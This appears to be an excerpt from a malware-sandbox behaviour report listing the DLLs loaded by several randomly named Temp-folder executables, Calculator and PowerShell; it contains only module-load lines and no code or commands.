Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: twinui.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: avicap32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: msvfw32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vccorlib140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: concrt140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: msvcp140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: vcruntime140_app.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dcomp.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.datatransfer.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rometadata.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositorycore.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windowmanagementapi.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: inputhost.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: mrmcorer.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.staterepositoryclient.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: bcp47mrm.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dxcore.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.applicationmodel.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.shell.servicehostbuilder.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: uiamanager.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.core.textinput.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.immersive.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: dataexchange.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.storage.applicationdata.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.globalization.fontgroups.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: fontgroupsoverride.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.controls.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.energy.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.graphics.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: winrttracing.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.ui.xaml.phone.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: directmanipulation.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: profext.dll Jump to behavior
Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe Section loaded: windows.web.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
